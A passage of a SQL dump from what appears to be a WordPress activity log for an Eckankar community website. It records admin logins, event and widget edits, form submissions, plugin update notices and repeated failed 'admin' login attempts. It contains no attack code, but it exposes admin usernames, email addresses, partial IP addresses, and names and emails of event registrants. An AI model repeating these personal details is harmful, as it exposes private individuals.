HTML'),(216744,35674,'control_type','widget_form'),(216745,35674,'_message_key','appearance_customized'),(216746,35674,'_user_id','2'),(216747,35674,'_user_login','S8zhaBda'),(216748,35674,'_user_email','nada@zipnadanot.org'),(216749,35674,'_server_remote_addr','76.130.120.x'),(216750,35674,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(216751,35675,'widget_id_base','custom_html'),(216752,35675,'widget_name_translated','Custom HTML'),(216753,35675,'sidebar_id','null'),(216754,35675,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:60px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(216755,35675,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:60px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(216756,35675,'_message_key','widget_edited'),(216757,35675,'_user_id','2'),(216758,35675,'_user_login','S8zhaBda'),(216759,35675,'_user_email','nada@zipnadanot.org'),(216760,35675,'_server_remote_addr','76.130.120.x'),(216761,35675,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(216762,35676,'_user_id','2'),(216763,35676,'_user_login','S8zhaBda'),(216764,35676,'_user_email','nada@zipnadanot.org'),(216765,35676,'_message_key','user_logged_out'),(216766,35676,'_server_remote_addr','76.130.120.x'),(216767,35676,'_server_http_referer','https://eckankar-colorado.org/wp-admin/index.php'),(216768,35677,'post_id','269152'),(216769,35677,'post_type','nf_sub'),(216770,35677,'post_title',''),(216771,35677,'_message_key','post_updated'),(216772,35677,'_server_remote_addr','172.59.230.x'),(216773,35677,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(216774,35678,'post_id','269153'),(216775,35678,'post_type','nf_sub'),(216776,35678,'post_title',''),(216777,35678,'_message_key','post_updated'),(216778,35678,'_server_remote_addr','24.9.61.x'),(216779,35678,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(216780,35679,'failed_username','admin'),(216781,35679,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(216782,35679,'_message_key','user_unknown_login_failed'),(216783,35679,'_xmlrpc_request','true'),(216784,35679,'_server_remote_addr','154.26.129.x'),(216785,35680,'failed_username','sajad'),(216786,35680,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(216787,35680,'_message_key','user_unknown_login_failed'),(216788,35680,'_xmlrpc_request','true'),(216789,35680,'_server_remote_addr','139.180.191.x'),(216790,35681,'post_id','269154'),(216791,35681,'post_type','nf_sub'),(216792,35681,'post_title',''),(216793,35681,'_message_key','post_updated'),(216794,35681,'_server_remote_addr','75.216.248.x'),(216795,35681,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=Oct_2023_Chela_Newsletter&utm_medium=email'),(216796,35682,'post_id','269155'),(216797,35682,'post_type','nf_sub'),(216798,35682,'post_title',''),(216799,35682,'_message_key','post_updated'),(216800,35682,'_server_remote_addr','66.113.13.x'),(216801,35682,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=Oct_2023_Chela_Newsletter&utm_medium=email'),(216802,35683,'post_id','269156'),(216803,35683,'post_type','nf_sub'),(216804,35683,'post_title',''),(216805,35683,'_message_key','post_updated'),(216806,35683,'_server_remote_addr','66.113.13.x'),(216807,35683,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=Oct_2023_Chela_Newsletter&utm_medium=email'),(216808,35684,'post_id','269157'),(216809,35684,'post_type','mec-books'),(216810,35684,'post_title','Lynn Gardner &#8211; lynnie626@gmail.com'),(216811,35684,'_message_key','post_updated'),(216812,35684,'_server_remote_addr','172.58.109.x'),(216813,35684,'_server_http_referer','https://eckankar-colorado.org/events/eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998/?occurrence=2023-10-08'),(216814,35685,'post_id','269157'),(216815,35685,'post_type','mec-books'),(216816,35685,'post_title','Lynn Gardner &#8211; lynnie626@gmail.com'),(216817,35685,'post_meta_added','3'),(216818,35685,'_message_key','post_updated'),(216819,35685,'_server_remote_addr','172.58.109.x'),(216820,35685,'_server_http_referer','https://eckankar-colorado.org/events/eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998/?occurrence=2023-10-08'),(216821,35686,'post_id','269158'),(216822,35686,'post_type','nf_sub'),(216823,35686,'post_title',''),(216824,35686,'_message_key','post_updated'),(216825,35686,'_server_remote_addr','64.188.179.x'),(216826,35686,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(216827,35687,'user_id','15'),(216828,35687,'user_email','nadazipought@zilch.org'),(216829,35687,'user_login','john-admin-96'),(216830,35687,'_user_id','15'),(216831,35687,'_user_login','john-admin-96'),(216832,35687,'_user_email','nadazipought@zilch.org'),(216833,35687,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(216834,35687,'_message_key','user_logged_in'),(216835,35687,'_server_remote_addr','174.16.132.x'),(216836,35687,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(216837,35688,'post_id','269160'),(216838,35688,'post_type','mec-events'),(216839,35688,'post_title','Copy of MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(216840,35688,'_message_key','post_updated'),(216841,35688,'_user_id','15'),(216842,35688,'_user_login','john-admin-96'),(216843,35688,'_user_email','nadazipought@zilch.org'),(216844,35688,'_server_remote_addr','174.16.132.x'),(216845,35688,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=0cf803d8b7&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F04%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F04%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(216846,35689,'post_id','269160'),(216847,35689,'post_type','mec-events'),(216848,35689,'post_title','Beyond Soul Travel'),(216849,35689,'post_meta_added','78'),(216850,35689,'_message_key','post_updated'),(216851,35689,'_user_id','15'),(216852,35689,'_user_login','john-admin-96'),(216853,35689,'_user_email','nadazipought@zilch.org'),(216854,35689,'_server_remote_addr','174.16.132.x'),(216855,35689,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269160&action=edit'),(216856,35690,'post_id','269160'),(216857,35690,'post_type','mec-events'),(216858,35690,'post_title','Beyond Soul Travel'),(216859,35690,'post_meta_added','78'),(216860,35690,'_message_key','post_updated'),(216861,35690,'_user_id','15'),(216862,35690,'_user_login','john-admin-96'),(216863,35690,'_user_email','nadazipought@zilch.org'),(216864,35690,'_server_remote_addr','174.16.132.x'),(216865,35690,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269160&action=edit'),(216866,35691,'post_type','attachment'),(216867,35691,'attachment_id','269161'),(216868,35691,'attachment_title','MountainSide'),(216869,35691,'attachment_filename','MountainSide.webp'),(216870,35691,'attachment_mime','image/webp'),(216871,35691,'attachment_filesize','33988'),(216872,35691,'attachment_parent_id','269160'),(216873,35691,'attachment_parent_title','Beyond Soul Travel'),(216874,35691,'attachment_parent_post_type','mec-events'),(216875,35691,'_message_key','attachment_created'),(216876,35691,'_user_id','15'),(216877,35691,'_user_login','john-admin-96'),(216878,35691,'_user_email','nadazipought@zilch.org'),(216879,35691,'_server_remote_addr','174.16.132.x'),(216880,35691,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269160&action=edit'),(216881,35692,'post_id','269160'),(216882,35692,'post_type','mec-events'),(216883,35692,'post_title','Beyond Soul Travel'),(216884,35692,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Seeing, Knowing, Being<br>\n</span></strong></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Embark on an expansive journey – an in-person spiritual discussion to learn ways to tap into the God knowledge that is already within you.</span></p>\n<ul class=\"pl-5 list-disc mb-4\">\n	<li><span style=\"font-size: 14pt;\">What makes a spiritual life? Do you want freedom, knowledge, truth, or wisdom? Love?</span></li>\n	<li><span style=\"font-size: 14pt;\">Would you like to enjoy a heightened state of awareness 24 hours a day?</span></li>\n	<li><span style=\"font-size: 14pt;\">Are you interested in tapping into your own inner wisdom to help you in your daily life?</span></li>\n</ul>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this Meetup is for you. We will highlight techniques to help you learn how to have more of God’s love in your life. Our goal is that each person will gain spiritual insights that can make their life better.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome to join us. Free books will be available and there is no need to have the books ahead of time.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar</a> as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-parker/events/296519996/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(216885,35692,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Seeing, Knowing, Being<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Embark on an expansive journey – an in-person spiritual discussion to learn ways to tap into the God knowledge that is already within you.</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">What makes a spiritual life? Do you want freedom, knowledge, truth, or wisdom? Love?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Would you like to enjoy a heightened state of awareness 24 hours a day?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Are you interested in tapping into your own inner wisdom to help you in your daily life?</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this Meetup is for you. We will highlight techniques to help you learn how to have more of God’s love in your life. Our goal is that each person will gain spiritual insights that can make their life better.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome to join us. Free books will be available and there is no need to have the books ahead of time.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar</a> as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-parker/events/296519996/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(216886,35692,'post_prev_post_date','2023-10-03 17:32:08'),(216887,35692,'post_new_post_date','2023-10-03 17:34:05'),(216888,35692,'post_new_thumb_id','269161'),(216889,35692,'post_new_thumb_title','MountainSide'),(216890,35692,'_message_key','post_updated'),(216891,35692,'_user_id','15'),(216892,35692,'_user_login','john-admin-96'),(216893,35692,'_user_email','nadazipought@zilch.org'),(216894,35692,'_server_remote_addr','174.16.132.x'),(216895,35692,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269160&action=edit'),(216896,35693,'post_id','269160'),(216897,35693,'post_type','mec-events'),(216898,35693,'post_title','Beyond Soul Travel'),(216899,35693,'post_prev_post_status','draft'),(216900,35693,'post_new_post_status','publish'),(216901,35693,'post_prev_post_date','2023-10-03 17:34:05'),(216902,35693,'post_new_post_date','2023-10-03 17:34:56'),(216903,35693,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(216904,35693,'post_new_post_date_gmt','2023-10-03 23:34:56'),(216905,35693,'_message_key','post_updated'),(216906,35693,'_user_id','15'),(216907,35693,'_user_login','john-admin-96'),(216908,35693,'_user_email','nadazipought@zilch.org'),(216909,35693,'_server_remote_addr','174.16.132.x'),(216910,35693,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269160&action=edit'),(216911,35694,'post_id','269162'),(216912,35694,'post_type','nf_sub'),(216913,35694,'post_title',''),(216914,35694,'_message_key','post_updated'),(216915,35694,'_server_remote_addr','97.121.143.x'),(216916,35694,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(216917,35695,'failed_username','nicolewhitmore'),(216918,35695,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(216919,35695,'_message_key','user_unknown_login_failed'),(216920,35695,'_xmlrpc_request','true'),(216921,35695,'_server_remote_addr','74.249.242.x'),(216922,35696,'post_id','269163'),(216923,35696,'post_type','mec-books'),(216924,35696,'post_title','Tad &#8211; choll.03@comcast.net'),(216925,35696,'_message_key','post_updated'),(216926,35696,'_server_remote_addr','76.130.120.x'),(216927,35696,'_server_http_referer','https://eckankar-colorado.org/events/eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998/?occurrence=2023-10-08'),(216928,35697,'post_id','269163'),(216929,35697,'post_type','mec-books'),(216930,35697,'post_title','Tad &#8211; choll.03@comcast.net'),(216931,35697,'post_meta_added','3'),(216932,35697,'_message_key','post_updated'),(216933,35697,'_server_remote_addr','76.130.120.x'),(216934,35697,'_server_http_referer','https://eckankar-colorado.org/events/eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998/?occurrence=2023-10-08'),(216935,35698,'user_id','2'),(216936,35698,'user_email','nada@zipnadanot.org'),(216937,35698,'user_login','S8zhaBda'),(216938,35698,'_user_id','2'),(216939,35698,'_user_login','S8zhaBda'),(216940,35698,'_user_email','nada@zipnadanot.org'),(216941,35698,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(216942,35698,'_message_key','user_logged_in'),(216943,35698,'_server_remote_addr','76.130.120.x'),(216944,35698,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(216945,35699,'post_id','269109'),(216946,35699,'post_type','mec-events'),(216947,35699,'post_title','The Power of Grace'),(216948,35699,'_message_key','post_updated'),(216949,35699,'_user_id','2'),(216950,35699,'_user_login','S8zhaBda'),(216951,35699,'_user_email','nada@zipnadanot.org'),(216952,35699,'_server_remote_addr','76.130.120.x'),(216953,35699,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269109&action=edit'),(216954,35700,'post_id','269164'),(216955,35700,'post_type','mec-books'),(216956,35700,'post_title','Test2 &#8211; choll.03@comcast.net'),(216957,35700,'_message_key','post_updated'),(216958,35700,'_server_remote_addr','76.130.120.x'),(216959,35700,'_server_http_referer','https://eckankar-colorado.org/events/eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998/?occurrence=2023-10-08'),(216960,35701,'post_id','269164'),(216961,35701,'post_type','mec-books'),(216962,35701,'post_title','Test2 &#8211; choll.03@comcast.net'),(216963,35701,'post_meta_added','3'),(216964,35701,'_message_key','post_updated'),(216965,35701,'_server_remote_addr','76.130.120.x'),(216966,35701,'_server_http_referer','https://eckankar-colorado.org/events/eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998/?occurrence=2023-10-08'),(216967,35702,'post_id','266540'),(216968,35702,'post_type','mec-events'),(216969,35702,'post_title','ECK LIGHT &#038; SOUND TEMPLATE-In Person &#038; Online-CONTAINS REGISTRATION | Benefit Title goes here'),(216970,35702,'_message_key','post_updated'),(216971,35702,'_user_id','2'),(216972,35702,'_user_login','S8zhaBda'),(216973,35702,'_user_email','nada@zipnadanot.org'),(216974,35702,'_server_remote_addr','76.130.120.x'),(216975,35702,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=266540&action=edit'),(216976,35703,'_user_id','2'),(216977,35703,'_user_login','S8zhaBda'),(216978,35703,'_user_email','nada@zipnadanot.org'),(216979,35703,'_message_key','user_logged_out'),(216980,35703,'_server_remote_addr','76.130.120.x'),(216981,35703,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=af84f9d53c&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F05%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F05%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&action2=-1&orderby=title&order=asc'),(216982,35704,'user_id','2'),(216983,35704,'user_email','nada@zipnadanot.org'),(216984,35704,'user_login','S8zhaBda'),(216985,35704,'_user_id','2'),(216986,35704,'_user_login','S8zhaBda'),(216987,35704,'_user_email','nada@zipnadanot.org'),(216988,35704,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(216989,35704,'_message_key','user_logged_in'),(216990,35704,'_server_remote_addr','76.130.120.x'),(216991,35704,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(216992,35705,'_user_id','2'),(216993,35705,'_user_login','S8zhaBda'),(216994,35705,'_user_email','nada@zipnadanot.org'),(216995,35705,'_message_key','user_logged_out'),(216996,35705,'_server_remote_addr','76.130.120.x'),(216997,35705,'_server_http_referer','https://eckankar-colorado.org/wp-admin/admin.php?page=nf-submissions&form_id=61'),(216998,35706,'failed_username','vink'),(216999,35706,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(217000,35706,'_message_key','user_unknown_login_failed'),(217001,35706,'_xmlrpc_request','true'),(217002,35706,'_server_remote_addr','135.148.66.x'),(217003,35707,'plugin_name','Really Simple SSL'),(217004,35707,'plugin_current_version','7.0.9'),(217005,35707,'plugin_new_version','7.1.0'),(217006,35707,'_message_key','plugin_update_available'),(217007,35707,'_server_remote_addr','173.231.231.x'),(217008,35708,'plugin_name','Really Simple SSL'),(217009,35708,'plugin_current_version','7.0.9'),(217010,35708,'plugin_new_version','7.1.1'),(217011,35708,'_message_key','plugin_update_available'),(217012,35708,'_server_remote_addr','173.231.231.x'),(217013,35709,'failed_username','admin'),(217014,35709,'server_http_user_agent','Mozilla/5.0'),(217015,35709,'_message_key','user_unknown_login_failed'),(217016,35709,'_server_remote_addr','45.136.118.x'),(217017,35710,'plugin_name','Really Simple SSL'),(217018,35710,'plugin_current_version','7.0.9'),(217019,35710,'plugin_new_version','7.1.2'),(217020,35710,'_message_key','plugin_update_available'),(217021,35710,'_server_remote_addr','173.231.231.x'),(217022,35711,'failed_username','admin'),(217023,35711,'server_http_user_agent','Mozilla/5.0'),(217024,35711,'_message_key','user_unknown_login_failed'),(217025,35711,'_server_remote_addr','20.205.9.x'),(217026,35712,'failed_username','admin'),(217027,35712,'server_http_user_agent','Mozilla/5.0'),(217028,35712,'_message_key','user_unknown_login_failed'),(217029,35712,'_server_remote_addr','45.136.118.x'),(217030,35713,'failed_username','admin'),(217031,35713,'server_http_user_agent','Mozilla/5.0'),(217032,35713,'_message_key','user_unknown_login_failed'),(217033,35713,'_server_remote_addr','20.205.9.x'),(217034,35714,'failed_username','admin'),(217035,35714,'server_http_user_agent','Mozilla/5.0'),(217036,35714,'_message_key','user_unknown_login_failed'),(217037,35714,'_server_remote_addr','45.136.118.x'),(217038,35715,'failed_username','admin'),(217039,35715,'server_http_user_agent','Mozilla/5.0'),(217040,35715,'_message_key','user_unknown_login_failed'),(217041,35715,'_server_remote_addr','20.205.9.x'),(217042,35716,'failed_username','admin'),(217043,35716,'server_http_user_agent','Mozilla/5.0'),(217044,35716,'_message_key','user_unknown_login_failed'),(217045,35716,'_server_remote_addr','45.136.118.x'),(217046,35717,'failed_username','admin'),(217047,35717,'server_http_user_agent','Mozilla/5.0'),(217048,35717,'_message_key','user_unknown_login_failed'),(217049,35717,'_server_remote_addr','20.205.9.x'),(217050,35718,'failed_username','admin'),(217051,35718,'server_http_user_agent','Mozilla/5.0'),(217052,35718,'_message_key','user_unknown_login_failed'),(217053,35718,'_server_remote_addr','20.205.9.x'),(217054,35719,'failed_username','admin'),(217055,35719,'server_http_user_agent','Mozilla/5.0'),(217056,35719,'_message_key','user_unknown_login_failed'),(217057,35719,'_server_remote_addr','45.136.118.x'),(217058,35720,'failed_username','admin'),(217059,35720,'server_http_user_agent','Mozilla/5.0'),(217060,35720,'_message_key','user_unknown_login_failed'),(217061,35720,'_server_remote_addr','20.205.9.x'),(217062,35721,'failed_username','admin'),(217063,35721,'server_http_user_agent','Mozilla/5.0'),(217064,35721,'_message_key','user_unknown_login_failed'),(217065,35721,'_server_remote_addr','45.136.118.x'),(217066,35722,'failed_username','admin'),(217067,35722,'server_http_user_agent','Mozilla/5.0'),(217068,35722,'_message_key','user_unknown_login_failed'),(217069,35722,'_server_remote_addr','20.205.9.x'),(217070,35723,'failed_username','admin'),(217071,35723,'server_http_user_agent','Mozilla/5.0'),(217072,35723,'_message_key','user_unknown_login_failed'),(217073,35723,'_server_remote_addr','20.205.9.x'),(217074,35724,'failed_username','admin'),(217075,35724,'server_http_user_agent','Mozilla/5.0'),(217076,35724,'_message_key','user_unknown_login_failed'),(217077,35724,'_server_remote_addr','45.136.118.x'),(217078,35725,'failed_username','admin'),(217079,35725,'server_http_user_agent','Mozilla/5.0'),(217080,35725,'_message_key','user_unknown_login_failed'),(217081,35725,'_server_remote_addr','20.205.9.x'),(217082,35726,'failed_username','admin'),(217083,35726,'server_http_user_agent','Mozilla/5.0'),(217084,35726,'_message_key','user_unknown_login_failed'),(217085,35726,'_server_remote_addr','45.136.118.x'),(217086,35727,'failed_username','admin'),(217087,35727,'server_http_user_agent','Mozilla/5.0'),(217088,35727,'_message_key','user_unknown_login_failed'),(217089,35727,'_server_remote_addr','20.205.9.x'),(217090,35728,'failed_username','admin'),(217091,35728,'server_http_user_agent','Mozilla/5.0'),(217092,35728,'_message_key','user_unknown_login_failed'),(217093,35728,'_server_remote_addr','45.136.118.x'),(217094,35729,'failed_username','admin'),(217095,35729,'server_http_user_agent','Mozilla/5.0'),(217096,35729,'_message_key','user_unknown_login_failed'),(217097,35729,'_server_remote_addr','20.205.9.x'),(217098,35730,'failed_username','admin'),(217099,35730,'server_http_user_agent','Mozilla/5.0'),(217100,35730,'_message_key','user_unknown_login_failed'),(217101,35730,'_server_remote_addr','45.136.118.x'),(217102,35731,'failed_username','admin'),(217103,35731,'server_http_user_agent','Mozilla/5.0'),(217104,35731,'_message_key','user_unknown_login_failed'),(217105,35731,'_server_remote_addr','20.205.9.x'),(217106,35732,'failed_username','admin'),(217107,35732,'server_http_user_agent','Mozilla/5.0'),(217108,35732,'_message_key','user_unknown_login_failed'),(217109,35732,'_server_remote_addr','45.136.118.x'),(217110,35733,'failed_username','admin'),(217111,35733,'server_http_user_agent','Mozilla/5.0'),(217112,35733,'_message_key','user_unknown_login_failed'),(217113,35733,'_server_remote_addr','20.205.9.x'),(217114,35734,'failed_username','admin'),(217115,35734,'server_http_user_agent','Mozilla/5.0'),(217116,35734,'_message_key','user_unknown_login_failed'),(217117,35734,'_server_remote_addr','45.136.118.x'),(217118,35735,'failed_username','admin'),(